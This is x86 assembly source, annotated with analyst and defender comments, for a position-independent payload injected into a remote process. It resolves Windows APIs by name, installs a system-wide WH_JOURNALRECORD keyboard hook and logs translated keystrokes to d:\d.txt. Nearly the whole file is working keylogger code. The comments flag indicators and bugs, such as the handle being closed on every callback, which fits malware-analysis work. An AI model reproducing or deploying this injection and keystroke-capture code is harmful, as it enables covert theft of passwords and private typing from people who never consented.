; Relocatable data block. Everything from REMOTE_CODE_START to REMOTE_CODE_END
; is copied as one unit and addressed as [ebx + sym], where ebx is the delta
; offset each proc computes with call/pop, so the layout below is part of the
; program's contract: the _lp* slots are filled in table order by the
; GetProcAddress loops in _RemoteThread and must line up with the _sz* names.
REMOTE_CODE_START equ this byte
; First three slots are never written by the visible code; presumably the
; injecting process fills them before the copy — verify against the caller.
_lpLoadLibrary dd ?                     ; not referenced in the visible code
_lpGetProcAddress dd ?
_lpGetModuleHandle dd ?
; user32 slots: filled by the first loop, in the order of
; _szCallNextHookEx .. _szMessageBox (7 entries).
_lpCallNextHookEx dd ?
_lpGetKeyboardState dd ?
_lpGetKeyState dd ?
_lpToAscii dd ?
_lpUnhookWindowsHookEx dd ?
_lpSetWindowsHookEx dd ?
_lpMessageBox dd ?
; kernel32 slots: filled by the second loop, in the order of
; _szCreateFile .. _szWriteFile (5 entries).
_lpCreateFile dd ?
_lpCloseHandle dd ?
_lpGetCurrentProcess dd ?
_lpWaitForSingleObject dd ?
_lpWriteFile dd ?
_hInstance dd ?                         ; GetModuleHandle(NULL) of the host process
_hHook dd ?                             ; handle returned by SetWindowsHookExW
_hFile dd ?                             ; not referenced in the visible code
_lphFile dd ?                           ; handle returned by CreateFileA (log file)
; Name tables. The loops advance esi past each NUL and stop when the byte
; that follows is also 0, so the trailing ",0,0" on the last name of each
; list is the list terminator, not padding.
_szCallNextHookEx db 'CallNextHookEx',0
_szGetKeyboardState db 'GetKeyboardState',0
_szGetKeyState db 'GetKeyState',0
_szToAscii db 'ToAscii',0
_szUnhookWindowsHookEx db 'UnhookWindowsHookEx',0
_szSetWindowsHookEx db 'SetWindowsHookExW',0
_szMessageBox db 'MessageBoxA',0,0      ; double NUL ends the user32 list
_szCreateFile db 'CreateFileA',0
_szCloseHandle db 'CloseHandle',0
_szGetCurrentProcess db 'GetCurrentProcess',0
_szWaitForSingleObject db 'WaitForSingleObject',0
_szWriteFile db 'WriteFile',0,0         ; double NUL ends the kernel32 list
_szDllKernel32 db 'kernel32.dll',0
_szDllUser32 db 'user32.dll',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; DWORD WINAPI _RemoteThread(LPVOID lParam)
; Thread entry executed inside the target process (x86-32, stdcall).
; Resolves the user32 and kernel32 import slots of the data block through
; _lpGetModuleHandle / _lpGetProcAddress, then transfers to _ProcMain.
; In:    lParam — not used by the visible code
; Regs:  ebx = delta offset (runtime address of @@ minus its assembled
;        offset); every [ebx + sym] below is therefore position independent
;        esi = cursor into the name table, edi = cursor into the slot table
; Clobb: eax, ecx, edx, flags (ebx/esi/edi restored by 'uses')
; Analyst note: an injected thread walking NUL-separated API name lists with
; GetProcAddress is a typical indicator of a manually relocated payload.
;-----------------------------------------------------------------------
_RemoteThread proc uses ebx esi edi lParam
local @hModule                          ; user32.dll base
local @hModule2                         ; kernel32.dll base
; Delta-offset idiom: the return address pushed by 'call' is the runtime
; address of @@; subtracting its link-time offset yields the relocation base.
call @F
@@:
pop ebx
sub ebx,offset @B
;*********************************************************************
push NULL
call [ebx + _lpGetModuleHandle]         ; hInstance of the host executable
mov [ebx + _hInstance],eax
lea eax,[ebx + offset _szDllUser32]
push eax
call [ebx + _lpGetModuleHandle]         ; assumes user32 is already loaded
mov @hModule,eax
lea eax,[ebx + offset _szDllKernel32]
push eax
call [ebx + _lpGetModuleHandle]
mov @hModule2,eax
;*********************************************************************
; user32 list: esi -> first name, edi -> first slot; one GetProcAddress per
; name, slot table advanced by 4 (one dd) each time.
lea esi,[ebx + offset _szCallNextHookEx]
lea edi,[ebx + offset _lpCallNextHookEx]
.while TRUE
push esi
push @hModule
call [ebx + _lpGetProcAddress]          ; result is stored unchecked (may be 0)
mov [edi],eax
add edi,4
@@:
lodsb                                   ; skip to the byte after this name's NUL
or al,al
jnz @B
.break .if !byte ptr [esi]              ; a second NUL terminates the list
.endw
; kernel32 list, same scheme.
lea esi,[ebx + offset _szCreateFile]
lea edi,[ebx + offset _lpCreateFile]
.while TRUE
push esi
push @hModule2
call [ebx + _lpGetProcAddress]
mov [edi],eax
add edi,4
@@:
lodsb
or al,al
jnz @B
.break .if !byte ptr [esi]
.endw
call _ProcMain                          ; does not return in the visible code (infinite wait)
ret
_RemoteThread endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; void _ProcMain(void)
; Reached from _RemoteThread once the import slots are resolved.
; 1. Builds the path "d:\d.txt" byte by byte in a stack buffer (no string
;    literal that would need relocating).
; 2. CreateFileA(path, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ, NULL,
;    OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) -> _lphFile.
; 3. SetWindowsHookExW(WH_JOURNALRECORD, ReHook, _hInstance, 0) -> _hHook;
;    dwThreadId = 0 requests a system-wide hook.
; 4. WaitForSingleObject(GetCurrentProcess(), INFINITE) — blocks the thread
;    for the lifetime of the process so the hook stays installed.
; Regs:  ebx = delta offset as in _RemoteThread; the hook procedure address
;        passed to SetWindowsHookExW is ebx + offset ReHook (relocated).
; Clobb: eax, ecx, edx, flags
; Defender note: a WH_JOURNALRECORD hook plus creation of d:\d.txt from a
; thread that does not belong to any loaded module are the observable
; side effects of this routine.
;-----------------------------------------------------------------------
_ProcMain proc uses ebx edi esi
local @hHandle                          ; not referenced in the visible code
local @szFileName[32]:byte              ; receives "d:\d.txt",0
; edi is already preserved by 'uses'; this push/pop pair is redundant.
; stosb relies on DF being clear — assumed here, not set explicitly.
push edi
lea edi,@szFileName
mov al,'d'
stosb
mov al,':'
stosb
mov al,'\'
stosb
mov al,'d'
stosb
mov al,'.'
stosb
mov al,'t'
stosb
mov al,'x'
stosb
mov al,'t'
stosb
mov al,0                                ; NUL terminator
stosb
pop edi
; Delta offset (same idiom as _RemoteThread; recomputed because ebx is
; not passed in).
call @F
@@:
pop ebx
sub ebx,offset @B
; CreateFileA arguments, pushed right-to-left (stdcall).
push NULL                               ; hTemplateFile
push FILE_ATTRIBUTE_NORMAL              ; dwFlagsAndAttributes
push OPEN_ALWAYS                        ; dwCreationDisposition
push NULL                               ; lpSecurityAttributes
push FILE_SHARE_READ                    ; dwShareMode
mov eax,GENERIC_READ or GENERIC_WRITE
push eax                                ; dwDesiredAccess
lea eax,@szFileName
push eax                                ; lpFileName
call [ebx + _lpCreateFile]
; Only a 0 return is filtered; the handle is stored otherwise.
.if eax
mov [ebx + _lphFile],eax
.endif
; SetWindowsHookExW arguments, right-to-left.
push NULL                               ; dwThreadId = 0 (all threads)
mov eax,dword ptr [ebx + _hInstance]
push eax                                ; hMod
mov eax,ebx
add eax,offset ReHook                   ; lpfn = relocated address of ReHook
push eax
push WH_JOURNALRECORD                   ; idHook
call [ebx + _lpSetWindowsHookEx]
.if eax
mov [ebx + _hHook],eax
.endif
call [ebx + _lpGetCurrentProcess]       ; pseudo-handle, never signalled while the process lives
; Original author's note: "At least the remote thread can run this far!"
push INFINITE
push eax
call [ebx + _lpWaitForSingleObject]     ; blocks indefinitely
ret
_ProcMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;-----------------------------------------------------------------------
; LRESULT CALLBACK ReHook(int _dwCode, WPARAM _wParam, LPARAM _lParam)
; WH_JOURNALRECORD hook procedure (stdcall, entered from user32).
; Always forwards to CallNextHookEx first. On HC_ACTION, when the EVENTMSG
; at _lParam carries WM_KEYDOWN, it translates the key with ToAscii and
; writes the result to _lphFile, then closes _lphFile — the close happens on
; every invocation of the callback, not only on the key path.
; In:    _dwCode, _wParam, _lParam — hook parameters as delivered by user32
; Regs:  ebx = delta offset, recomputed here because the callback has no
;        caller-provided context. ebx is not listed in 'uses' and is not
;        restored: the caller's ebx is clobbered on return.
; Return: popad restores eax to the value captured at pushad, i.e. the
;        CallNextHookEx result; the 'xor eax,eax' just before popad does not
;        affect the returned value.
; Locals: @szKeyState — 256-byte keyboard state passed to ToAscii
;         @szAscii    — 32-byte buffer receiving the translated character(s)
;-----------------------------------------------------------------------
ReHook proc _dwCode,_wParam,_lParam
local @szKeyState[256]:byte
local @szAscii[32]:byte
call @F
@@:
pop ebx
sub ebx,offset @B
; CallNextHookEx(_hHook, _dwCode, _wParam, _lParam)
push _lParam
push _wParam
push _dwCode
mov eax,dword ptr [ebx + _hHook]
push eax
call [ebx + _lpCallNextHookEx]
pushad                                  ; keeps the CallNextHookEx result in the saved eax
.if _dwCode == HC_ACTION
mov edx,_lParam
assume edx:ptr EVENTMSG                 ; edx -> recorded input event
.if [edx].message == WM_KEYDOWN
lea eax,@szKeyState
push eax
call [ebx + _lpGetKeyboardState]        ; GetKeyboardState(@szKeyState)
push VK_SHIFT
call [ebx + _lpGetKeyState]             ; GetKeyState(VK_SHIFT)
mov @szKeyState + VK_SHIFT,al            ; low byte of the result overrides the SHIFT slot
mov ecx,[edx].paramH
shr ecx,16                              ; ecx = paramH >> 16, used as uScanCode — TODO confirm against EVENTMSG layout
; ToAscii(paramL, ecx, @szKeyState, @szAscii, 0); paramL presumed to be the virtual key
push 0                                  ; uFlags
lea eax,@szAscii
push eax                                ; lpChar
lea eax,@szKeyState
push eax                                ; lpKeyState
push ecx                                ; uScanCode
push [edx].paramL                       ; uVirtKey
call [ebx + _lpToAscii]
mov byte ptr @szAscii [eax],0           ; NUL after the eax characters ToAscii produced
; CR -> CR LF: the word write stores 0Ah,00h at offset 1.
.if @szAscii == 0dh
mov word ptr @szAscii+1,0ah
.endif
; WriteFile(_lphFile, @szAscii, 32, NULL, NULL): a fixed 32 bytes are written
; regardless of how many characters were produced, and lpNumberOfBytesWritten is NULL.
push NULL                               ; lpOverlapped
push NULL                               ; lpNumberOfBytesWritten
mov eax,32
push eax                                ; nNumberOfBytesToWrite
lea eax,@szAscii
push eax                                ; lpBuffer
mov eax,[ebx + _lphFile]
push eax                                ; hFile
call [ebx + _lpWriteFile]
.endif
assume edx:nothing
.endif
; CloseHandle(_lphFile) runs on every callback, including non-key events.
mov eax,[ebx + _lphFile]
push eax
call [ebx + _lpCloseHandle]
xor eax,eax                             ; overwritten by popad below
popad
ret
ReHook endp
REMOTE_CODE_END equ this byte
; Size of the contiguous code+data image from REMOTE_CODE_START; presumably
; the byte count the injecting side copies into the target — verify against caller.
REMOTE_CODE_LENGTH equ offset REMOTE_CODE_END - offset REMOTE_CODE_START